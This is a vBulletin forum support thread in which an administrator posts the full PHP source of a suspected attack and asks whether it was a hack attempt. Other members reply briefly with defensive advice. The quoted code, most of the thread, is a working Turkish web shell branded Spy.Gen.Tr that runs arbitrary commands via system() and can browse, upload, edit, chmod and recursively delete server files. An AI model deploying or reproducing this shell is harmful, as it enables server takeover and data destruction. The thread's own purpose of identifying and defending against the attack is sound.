Was this a hack attempt???

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Oreamnos
    Senior Member
    • Dec 2004
    • 178

    Was this a hack attempt???

    Some one just posted a ton of code in a thread and even got forms to appear within the post. I have since banned the user and soft deleted the post but i saved a PDF version of the post. Could someone pleeeease take a look at this and let me know if this was a hack attempt and if so, what steps should I take to protect myself.

    PDF version of post (108Kb)

    I am running 3.5.2 with the plugin patch for 3.5.3.

    thanks
    eric
    Websites For Sale | Adsense Ready Blogs For Sale
  • Oreamnos
    Senior Member
    • Dec 2004
    • 178

    #2
    this is the website that looks like they are responsible: spy.gen.tr

    and below is the code that made it to my email. any ideas???

    PHP Code:
    ***************
    <?php
    $default
    =$DOCUMENT_ROOT;
    $this_file="./phpinfo.php";



    if(isset(
    $save)){
    $fname=str_replace(" ","_",$fname);
    $fname=str_replace("%20","_",$fname);
    header("Cache-control: private");
    header("Content-type: application/force-download");
    header("Content-Length: ".filesize($save));
    header("Content-Disposition: attachment; filename=$fname");

    $fp fopen($save'r');
    fpassthru($fp);
    fclose($fp);
    unset(
    $save);
    exit;
    }

    if ( 
    function_exists('ini_get') ) {
            
    $onoff ini_get('register_globals');
    } else {
            
    $onoff get_cfg_var('register_globals');
    }
    if (
    $onoff != 1) {
            [
    at]extract($_POSTEXTR_SKIP);
            [
    at]extract($_GETEXTR_SKIP);
    }


    function 
    deltree($deldir) {
            
    $mydir=[at]dir($deldir);
            while(
    $file=$mydir->read())        {
                    if((
    is_dir("$deldir/$file")) AND ($file!=".") AND 
    (
    $file!="..")) {
                            [
    at]chmod("$deldir/$file",0777);
                            
    deltree("$deldir/$file");
                    }
                    if (
    is_file("$deldir/$file")) {
                            [
    at]chmod("$deldir/$file",0777);
                            [
    at]unlink("$deldir/$file");
                    }
            }
            
    $mydir->close();
            [
    at]chmod("$deldir",0777);
            echo [
    at]rmdir($deldir) ? "<center><b><font 
    color='#0000FF'>SİLİNDİ:
    $deldir/$file</b></font></center>" "<center><font 
    color=\"#ff0000\">Silinemedi:
    $deldir/$file</font></center>";
            }

    if (
    $op=='phpinfo'){
    $fonk_kap get_cfg_var("fonksiyonları_kapat");
            echo 
    $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : 
    "<center>phpinfo() Komutu Ã‡alışmıyor</center>";
            exit;
    }

    if (
    $op=='me'){
    echo 
    "<html>
          <head>
                <title>PHP info</title>
          </head>
          <body bgcolor='#003366' text='#0000FF' link='#0000FF' 
    vlink='#0000FF' alink='#00FF00'>
          <center>...:::Spy.Gen.Tr::...</center>
          <center><br>http://www.spy.gen.tr<br>
          <br>PHP info,<br>
          <br>By<br>
          <br>Kruis<br>
          <br></center>"
    ;

    $sayi='7';
    while(
    $sayi>=1){
    echo 
    "<center><font size='$sayi' color='#FFFFFF'>info<font 
    color='#008000'> info</font> <font color='#FF0000'>info</font> </font></center>"
    ;
    $sayi--;
    }
    $sayi2='1';
    while(
    $sayi2<=7){
    echo 
    "<center><font size='$sayi2
    color='#008000'>Admin[at]Spy.Gen.Tr</font></center>"
    ;
    $sayi2++;
    };

    echo 
    "</body>
          </html>"
    ;
    exit;
    }


    echo 
    "<html>
          <head>
                 <title>PHP info</title>
          </head>

           <body bgcolor='#003366' text='#008000' link='#00FF00' 
    vlink='#00FF00' alink='#00FF00'>
           </body>"
    ;

    echo 
    "<center><font size='+3' color='#FF0000'><b> 
    ...:::Spy.Gen.Tr:::...</b></font></center><br>
          <center><font size='+2' color='#FFFFFF'>PHP </font><font 
    size='+2' color='#FF0000'>info</font><br>
          <br>"
    ;
    echo 
    "<center><a href='./$this_file?dir=$dir'>ANA BOLUM</a></center>";
    echo 
    "<br>";
    echo 
    "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP 
    INFO</a></center>"
    ;
    echo 
    "<br>";
    echo 
    "<center><a href='./$this_file?op=wshell&dir=$dir'>WEB 
    SHELL</a></center>"
    ;
    echo 
    "<br>
          <br>
          <br>"
    ;
    echo 
    "<center>---><a href='./$this_file?op=me' 
    target='_blank'>Hakkimda</a><---</center>"
    ;

    echo 
    "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo 
    "<div align=center>
          <font size='+1' color='#0000FF'><u>Root Klasör</u>: 
    $DOCUMENT_ROOT</font><br>
          <font size='+1'color='#0000FF'><u>PHPinfo'nun URL'si</u>: 
    http://
    $HTTP_HOST$REDIRECT_URL</font> <form method=post 
    action=
    $this_file>";

    if(!isset(
    $dir)){
    $dir="$default";
    }
    echo 
    "<input type=text size=60 name=dir value='$dir'>
    <input type=submit value='GIT'><br>
    </form>
    </div>"
    ;

    if (
    $op=='wshell'){
    echo 
    "<br><center><font size='+1' 
    color='#FF0000'>WEBSHELL</font></center>"
    ;
    if (isset(
    $ok)){
    if (empty(
    $kod)){
    die (
    "<center><font color='#FF0000'>Komut Yazilmadi</font><center>");
    }
    echo 
    "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
          <br>"
    ;
    echo 
    "<center><input type=text size=35 name=kod value='$kod'><input 
    type=submit name=ok value='CALISTIR'>
          <br>
          <br></center></form>"
    ;
    echo 
    "<center><TEXTAREA rows=30 cols=85 readonly>";
    system("$kod");
    echo 
    "</TEXTAREA></center>";
    exit;

    } elseif (empty(
    $ok)){
    echo 
    "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
          <br>"
    ;
    echo 
    "<center><input type=text size=35 name=kod value='Calistirmak 
    istediginiz komutu buraya girin'><input type=submit name=ok 
    value='CALISTIR'>
          <br>
          <br></center></form>"
    ;
    echo 
    "<center><TEXTAREA rows=30 cols=85></TEXTAREA></center>";
    exit;
    }
    }

    if (
    $op=='up'){
            
    $path=dir;
            echo 
    "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA 
    GONDERME</b></font></center><br>"
    ;
    if(isset(
    $dy)) {

    if(empty(
    $dosya_gonder)){
    } else {
    copy $dosya_gonder"$dir/$dosya_gonder_name") ? 
    print(
    "$dosya_gonder_name <font color='#0000FF'>kopyalandı</font><br>") : 
    print(
    "$dosya_gonder_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    if(empty(
    $dosya_gonder2)){
    } else {
    copy $dosya_gonder2"$dir/$dosya_gonder2_name") ? 
    print(
    "$dosya_gonder2_name <font color='#0000FF'>kopyalandı</font>ı<br>") : 
    print(
    "$dosya_gonder2_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    if(empty(
    $dosya_gonder3)){
    } else {
    copy $dosya_gonder3"$dir/$dosya_gonder3_name") ? 
    print(
    "$dosya_gonder3_name <font color='#0000FF'>kopyalandı</font><br>") : 
    print(
    "$dosya_gonder3_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    if(empty(
    $dosya_gonder4)){
    } else {
    copy $dosya_gonder4"$dir/$dosya_gonder4_name") ? 
    print(
    "$dosya_gonder4_name <font color='#0000FF'>kopyalandı</font><br>") : 
    print(
    "$dosya_gonder4_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    } elseif(empty(
    $dy )) {
    $path=$dir;
    $dir $dosya_dizin;
    echo 
    "$dir";
    echo 
    "<FORM  ENCTYPE='multipart/form-data' 
    ACTION='
    $this_file?op=up&dir=$path' METHOD='POST'>";
    echo 
    "<center><INPUT TYPE='file' NAME='dosya_gonder' 
    size="
    20"></center><br>";
    echo 
    "<center><INPUT TYPE='file' NAME='dosya_gonder2' 
    size="
    20"></center><br>";
    echo 
    "<center><INPUT TYPE='file' NAME='dosya_gonder3' 
    size="
    20"></center><br>";
    echo 
    "<center><INPUT TYPE='file' NAME='dosya_gonder4' 
    size="
    20"></center><br>";

    echo 
    "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya 
    Yolla!'></center>"
    ;
    echo 
    "</form>";


    echo 
    "</html>";
    }
    }


    if(
    $op=='mf'){
        
    $path=$dir;
        if(isset(
    $dismi) && isset($kodlar)){
                    
    $ydosya="$path/$dismi";
                    if(
    file_exists("$path/$dismi")){
                            
    $dos"Böyle Bir Dosya Vardı Ãœzerine 
    Yazıldı"
    ;
                    } else {
                            
    $dos "Dosya Oluşturuldu";
                    }
                    
    touch ("$path/$dismi") or die("Dosya 
    Oluşturulamıyor"
    );
                    
    $ydosya2 fopen("$ydosya"'w') or die("Dosya yazmak 
    için açılamıyor"
    );
                    
    fwrite($ydosya2$kodlar) or die("Dosyaya 
    yazılamıyor"
    );
                    
    fclose($ydosya2);
                    echo 
    "<center><font 
    color='#0000FF'>
    $dos</font></center>";
            } else {

            echo 
    "<FORM METHOD='POST' 
    ACTION='
    $this_file?op=mf&dir=$path'>";
            echo 
    "<center>Dosya İsmi :<input type='text' name='dismi' 
    size="
    20"></center><br>";
        echo 
    "<br>";
        echo 
    "<center>KODLAR</center><br>";
        echo 
    "<center><TEXTAREA NAME='kodlar' ROWS='19' 
    COLS='52'></TEXTAREA></center>"
    ;
            echo 
    "<center><INPUT TYPE='submit' name='okmf' 
    value='TAMAM'></center>"
    ;
        echo 
    "</form>";
            }
    }

    if(
    $op=='md'){
            
    $path=$dir;
            if(isset(
    $kismi) && isset($okmf)){
                    
    $klasör="$path/$kismi";
                    
    mkdir("$klasör"0777) or die ("<center><font 
    color='#0000FF'>Klasör Oluşturulamıyor</font></center>"
    );
                    echo 
    "<center><font color='#0000FF'>Klasör 
    Oluşturuldu</font></center>"
    ;
            }

            echo 
    "<FORM METHOD='POST' 
    ACTION='
    $this_file?op=md&dir=$path'>";
            echo 
    "<center>Klasör İsmi :<input type='text' name='kismi' 
    size="
    20"></center><br>";
            echo 
    "<br>";
            echo 
    "<center><INPUT TYPE='submit' name='okmf' 
    value='TAMAM'></center>"
    ;
            echo 
    "</form>";
    }


    if(
    $op=='del'){
    unlink("$fname");
    }


    if(
    $op=='dd'){
            
    $dir=$here;
                    
    $deldirs=$yol;
                    if(!
    file_exists("$deldirs")) {
                            echo 
    "<font color=\"#ff0000\">Dosya 
    Yok</font>"
    ;
                    } else {
                            
    deltree($deldirs);
                    }
    }



    if(
    $op=='edit'){
    $yol=$fname;
    $yold=$path;
    if (isset(
    $ok)){
    $dosya fopen("$yol"'w') or die("Dosya Açılamıyor");
    $metin=$tarea;
    fwrite($dosya$metin) or die("Yazılamıyor!");
    fclose($dosya);
    echo 
    "<center>
          <p><font color='#0000FF'Dosya Başarıyla Düzenlendi</font></p>
          </center>"
    ;
    } else {
    $path=$dir;
    echo 
    "<center>DÃœZENLE: $yol</center>";
    $dosya fopen("$yol"'r') or die("<center>
          <p><font color='#FF0000'Dosya Açılamıyor</font></p>
          </center>"
    );
    $boyut=filesize($yol);
    $duzen = [at]fread ($dosya$boyut);
    echo 
    "<form method=post 
    action=
    $this_file?op=edit&fname=$yol&dir=$path>";
    echo 
    "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea 
    rows=19 cols=52>
    $duzen</TEXTAREA></center><br>";
    echo 
    "<center><input type='Submit' value='TAMAM' name='ok'></center>";
    fclose($dosya);
    $duzen=htmlspecialchars($duzen);
    echo 
    "</form>";
    }
    }

    if(
    $op=='efp2'){
    $fileperm=base_convert($_POST['fileperm'],8,10);
            echo 
    $msg=[at]chmod($dir."/".$dismi2,$fileperm) ? "<font 
    color='#0000FF'><b>
    $dismi2 İSİMLİ DOSYANIN</font></b>" "<font 
    color=\"#ff0000\">DEİŞTİRİLEMEDİ!!</font>"
    ;
            echo 
    " <font color='#0000FF'>CHMODU 
    "
    .substr(base_convert([at]fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEİŞTİRİLDİ</font>";
    }

    if(
    $op=='efp'){
    $izinler2=substr(base_convert([at]fileperms($fname),10,8),-4);
    echo 
    "<form method=post action=./$this_file?op=efp2>
          <div align=center>
            <input name='dismi2' type='text' value='
    $dismi' class='input' 
    readonly size="
    20">CHMOD:
          <input type='text' name='fileperm' size='20' value='
    $izinler2
    class='input'>
          <input name='dir' type='hidden' value='
    $yol'>
          <input type='submit' value='TAMAM' class='input'></div><br>
          </form>"
    ;

    }


    $path=$dir;
    if(isset(
    $dir)){
    if (
    $dir = [at]opendir("$dir")) {
    while ((
    $file readdir($dir)) !== false) {
    if(
    $file!="." && $file!=".."){
    if(
    is_file("$path/$file")){
    $disk_space=filesize("$path/$file");
    $kb=$disk_space/1024;
    $total_kb number_format($kb2'.''');
    $total_kb2="Kb";


    echo 
    "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> 
    $file</b></font> - <a 
    href='./
    $this_file?save=$path/$file&fname=$file'>indir</a> - <a 
    href='./
    $this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
    echo 
    "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> 
    - <b>
    $total_kb$total_kb2</b> - ";
    [
    at]$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
    echo 
    "<a 
    href='./
    $this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
    echo 
    "<br></div>\n";
    }else{
    echo 
    "<div align=left><a href='./$this_file?dir=$path/$file'>GİT></a> 
    <font face='arial' size='3' color='#808080'> 
    $path/$file</font> - 
    <b>DIR</b> - <a href='./
    $this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> 
    - "
    ;
    $dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
    echo 
    "<font color='#FFFF00'>$dirperm</font>";
    echo 
    " <br></div>\n";

    }
    }
    }
    closedir($dir);
    }
    }




    echo 
    "<center>------------------------------</center>";
    echo 
    "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root 
    Klasörüne Git</a></center>"
    ;
    echo 
    "<center><a href='./$this_file?dir=/'>Linux Kök Dizinine 
    Git</a></center>"
    ;
    if(
    file_exists("B:\\")){
    echo 
    "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
    } else {}
    if(
    file_exists("C:\\")){
    echo 
    "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
    } else {}
    if (
    file_exists("D:\\")){
     echo 
    "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
    } else {}
    if (
    file_exists("E:\\")){
     echo 
    "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
    } else {}
    if (
    file_exists("F:\\")){
     echo 
    "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
    } else {}
    if (
    file_exists("G:\\")){
     echo 
    "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
    } else {}
    if (
    file_exists("H:\\")){
     echo 
    "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
    } else {}


    echo 
    "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo 
    "<center><font size='+1' color='#FF0000'><b>SERVER 
    BİLGİLERİ</b></font><br></center>"
    ;
    echo 
    "<br><u><b>$SERVER_SIGNATURE</b></u>";
    echo 
    "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
    echo 
    "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
    echo 
    "<br>";
    echo 
    "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo 
    "<center><font size='+1' 
    color='#FF0000'><b>İŞLEMLER</b></font><br></center>"
    ;
    echo 
    "<br><center><font size='4'><a 
    href='
    $this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
    echo 
    "<br><center><font size='4'><a 
    href='
    $this_file?op=mf&dir=$path'>Dosya Oluştur</a></font></center>";
    echo 
    "<br><center><font size='4'><a 
    href='
    $this_file?op=md&dir=$path'>Klasör Oluştur</a></font></center>";
    echo 
    "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo 
    "<br>
          <center>Herseyi PHP info'ya bırakın</center>"
    ;
    ?>
    ***************
    Websites For Sale | Adsense Ready Blogs For Sale

    Comment

    • derfy
      Senior Member
      • Jul 2005
      • 244
      • 3.8.x

      #3
      I see a lot of unlink()'s and a function named deltree(). I'd have to say yes, this was a hacking attempt. Or at least someone trying to ruin your day.

      Do you allow HTML posting in the forum it was posted in?

      Comment

      • Oreamnos
        Senior Member
        • Dec 2004
        • 178

        #4
        that's what i was afraid of...

        Originally posted by derfy
        Do you allow HTML posting in the forum it was posted in?
        no, i don't but they somehow figured out how to display html in their post.
        Websites For Sale | Adsense Ready Blogs For Sale

        Comment

        • Oreamnos
          Senior Member
          • Dec 2004
          • 178

          #5
          Any opinions or suggestions or words of comfort from the vB guys? I'm kind of freaking out here.

          thanks
          eric
          Websites For Sale | Adsense Ready Blogs For Sale

          Comment

          • Steve Machol
            Former Customer Support Manager
            • Jul 2000
            • 154488

            #6
            I suggest you see this thread on how to make your vBulletin more secure:



            If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.
            Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
            Change CKEditor Colors to Match Style (for 4.1.4 and above)

            Steve Machol Photography


            Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


            Comment

            widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
            Working...